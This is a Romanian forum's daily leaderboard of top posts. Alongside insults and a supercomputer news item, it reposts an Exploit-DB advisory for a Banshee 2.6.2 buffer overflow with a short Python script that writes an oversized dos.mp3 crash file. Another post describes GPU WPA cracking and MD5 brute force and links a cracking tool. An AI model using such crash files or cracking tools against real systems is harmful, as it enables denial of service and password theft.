Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 06/22/16 in all areas

  1. Starneste nervi printre locatari ? cine-s aia, tu si vecinii din bloc ? Probabil te-ai certat cu ei ca nu au vrut sa scoata vreo stire din site Biscuitele da-l la un caine. Te-n ma-ta cu biscuitul pulei.
    9 points
  2. Manufacturer: NRCPC Cores: 10,649,600 Linpack Performance (Rmax) 93,014.6 TFlop/s Theoretical Peak (Rpeak) 125,436 TFlop/s Nmax 12,288,000 Power: 15,371.00 kW Memory: 1,310,720 GB Processor: Sunway SW26010 260C 1.45GHz Interconnect: Sunway Operating System: Sunway RaiseOS 2.0.5 A Chinese supercomputer called Sunway TaihuLight now ranks as the world's fastest, nearly tripling the previous supercomputer speed record with a rating of 93 petaflops per second. That's 93 quadrillion floating point operations per second (or 93 million billion). Sunway TaihuLight surpassed another Chinese supercomputer, Tianhe-2, which had been the world's fastest for three consecutive years with speeds of 33.9 petaflop/s, according to the latest Top500.org ranking released today. Top500 rankings are based on the Linpack benchmark, which requires each cluster "to solve a dense system of linear equations." "Sunway TaihuLight, with 10,649,600 computing cores comprising 40,960 nodes, is twice as fast and three times as efficient as Tianhe-2," the Top500 announcement said. Sunway TaihuLight is one of the world's most efficient systems, with "peak power consumption under load (running the HPL benchmark)... at 15.37MW, or 6 Gflops/Watt." The system has memory of 1.3PB, or 32GB for each node. This is actually not much memory considering how many cores the system has; if it used "a more reasonable amount of memory for its size," Sunway TaihuLight would be a lot more power-hungry. Sunway has more than three times as many cores as Tianhe-2, but it uses less overall power—15.37MW vs 17.8MW. Tianhe-2 had been the world's fastest in six consecutive rankings, which are released twice a year. Tianhe-2 took the top spot for the first time in June 2013, beating the previous fastest supercomputer, which held the position just once. Developed by China's National Research Center of Parallel Computer Engineering & Technology, Sunway TaihuLight is installed at the National Supercomputing Center in Wuxi, China. While Tianhe-2 uses Intel processors, Sunway TaihuLight was built entirely with processors designed and manufactured in China. Sunway TaihuLight uses a custom interconnect based on PCIe 3.0 technology. Each node in Sunway TaihuLight has one SW26010 chip, a new version of the ShenWei processor that produces speeds of 3 teraflop/s with 260 cores. This is a 1.45GHz 64-bit RISC processor, but the Top500 announcement said "its underlying architecture is somewhat of a mystery." "At 3 teraflops, the new ShenWei silicon is on par with Intel’s 'Knights Landing' Xeon Phi, another many-core design, but one with a much more public history," Top500 said. "In a bit of related irony, it was the US embargo of high-end processors, such as the Xeon Phi, imposed on a number of Chinese supercomputing centers in April 2015, which precipitated a more concerted effort in that country to develop and manufacture such chips domestically. The embargo probably didn’t impact the TaihuLight timeline, since it was already set to get the new ShenWei parts. But it was widely thought that Tianhe-2 was in line to get an upgrade using Xeon Phi processors, which would have likely raised its performance into 100-petaflop territory well before the Wuxi system came online." While the US embargo is in place because of concern about nuclear research, Top500.org said Sunway TaihuLight is planned for use in research and engineering work in fields including climate, weather and Earth systems modeling, life science research, advanced manufacturing, and data analytics. Surse: http://www.top500.org/system/178764 http://arstechnica.com/information-technology/2016/06/10-million-core-supercomputer-hits-93-petaflops-tripling-speed-record/
    3 points
  3. Ai aici instructiuni si firmware-ul original, daca nu te descurci mai bine te duci la un service.
    1 point
  4. ''' Title: ==== Banshee 2.6.2 Local Buffer Overflow Vulnerability Credit: ====== Name: Ilca Lucian Contact: lucianfilca@gmail.com lucian@pwnthecode.org CVE: ===== Unknown (for moment) Product: ======= Play your music and videos. Keep up with your podcasts and Internet radio. Discover new music and podcasts. Keep your portable device loaded with good stuff. Simple enough to enjoy. Powerful enough to thrill. Open source through and through. Product link: http://www.banshee.fm Abstract: ======= Lucian I. discovered a Local Buffer Overflow vulnerability in Banshee Player 2.6.2 . Affected Version: ============= Ver 2.6.2 Date: ============ 19.06.2016 Exploitation-Technique: =================== Local Severity Rating: =================== 4.4 Details: ======= Vulnerability Description : Banshee Media Player is vulnerable to buffer overflow vulnerability.The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data. Impact : Banshee 2.6.2 is prone to a local buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Specifically, this issue occurs when opening a '.mp3' playlist file that contains excessive data. Attackers may leverage this issue to execute remote buffer overflow or inject arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. Path Log: type=PATH msg=audit(1466452858.351:14): item=0 name="/usr/bin/banshee" inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL type=PROCTITLE msg=audit(1466452858.351:14): proctitle=64656275676673002F7573722F62696E2F62616E73686565 type=SYSCALL msg=audit(1466452858.351:15): arch=c000003e syscall=2 success=yes exit=3 a0=7fffd6ed664f a1=80000 a2=ffffffff a3=ca items=1 ppid=16021 pid=9458 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=4294967295 comm="debugfs" exe="/sbin/debugfs" key=(null) type=CWD msg=audit(1466452858.351:15): cwd="/root/Downloads" type=PATH msg=audit(1466452858.351:15): item=0 name="/usr/bin/banshee" inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL type=PROCTITLE msg=audit(1466452858.351:15): proctitle=64656275676673002F7573722F62696E2F62616E73686565 type=SYSCALL msg=audit(1466453064.143:16): arch=c000003e syscall=59 success=yes exit=0 a0=126cb9f4 a1=adb4f30 a2=12b5d0c0 a3=593 items=3 ppid=1 pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1 comm="banshee" exe="/usr/bin/env" key=(null) type=EXECVE msg=audit(1466453064.143:16): argc=5 a0="/usr/bin/env" a1="bash" a2="/usr/bin/banshee" a3="--redirect-log" a4="--play-enqueued" type=CWD msg=audit(1466453064.143:16): cwd="/root" type=PATH msg=audit(1466453064.143:16): item=0 name="/usr/bin/banshee" inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL type=PATH msg=audit(1466453064.143:16): item=1 name="/usr/bin/env" inode=17567018 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL type=PATH msg=audit(1466453064.143:16): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=9047695 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL type=PROCTITLE msg=audit(1466453064.143:16): proctitle=2F7573722F62696E2F656E760062617368002F7573722F62696E2F62616E73686565002D2D72656469726563742D6C6F67002D2D706C61792D656E717565756564 type=SYSCALL msg=audit(1466453064.159:17): arch=c000003e syscall=2 success=yes exit=3 a0=16b4268 a1=0 a2=0 a3=8 items=1 ppid=1 pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1 comm="bash" exe="/bin/bash" key=(null) type=CWD msg=audit(1466453064.159:17): cwd="/root" Error report image link : https://postimg.org/image/x0x8raw2v/ Prerequisites: ====================== The attacker needs to entice victims to perform an action in order to exploit this vulnerability. Proof Of Concept: ================ POC Exploit code: ''' #!/usr/bin/python A = "\x41" p0c = 'A' * 7550 generate = "dos.mp3" file = open(generate , "w") file.write(p0c) file.close() ''' Risk: ===== The security risk of the Local Buffer Overflow Vulnerability is estimated as moderate. Credits: ======= Lucian Ilca ''' Source: https://www.exploit-db.com/exploits/39986/
    1 point
  5. Ba terminatule, nu vezi ca omul nu te-a injurat ? Esti exemplul clasic de roman care atunci cand nu poate aduce argumente unei conversatii, incepe sa injure.
    1 point
  6. Asta inseamna sa fii hacer bv bine gandit dar nu are rost sa le faci rau oamenilor :)... fii un white nu deep
    1 point
  7. @franxu Cumpara ruleta. Problem solved. http://www.ebay.com/bhp/roulette-table http://www.ebay.com/sch/Collectible-Casino-Roulette-Wheels-and-Sets/73489/bn_2311968/i.html
    1 point
  8. Am testat o placa grafica nvidia Ge Force GT 330 pt wpa cracking si MD5 bruteforce Spre exemplu merge repede in cazul unui password lung pana in 5 caractere , cu cat devine mai mare cu atat timpul creste Bineinteles mai multe placi ar fi facut mai multa treaba intrun timp mai scurt Watch video online Download Video: http://tinyurl.com/6bcjd5a MD5SUM 4aa64a3c8ff07a7395a5b2232e9849ac GPUPyrit+CudaMultiforcer.zip
    1 point
  9. ...azi maine or sa stea astia cu Cd-uri la colt de strada sa vanda iarba... ..si uite asa am mai pierdut minute importante din viatza mea ascultand la Idoser asta...
    1 point
  10. @fallen_angel @urs
    -1 points
  11. Salutare, Este deschisa o pagina "de stiri" cică, intr-un orasel mic. Acestia nicidecum nu posteaza stiri, ci numai aberatii care starneste nervi printre locatari si induce in eroare multa lume. Avem nevoie de raport-ul fiecaruia dintre voi, poate avem sanse sa o inchida. Link: https://m.facebook.com/profile.php?id=374760365899371 Arunc un biscuite
    -5 points
×
×
  • Create New...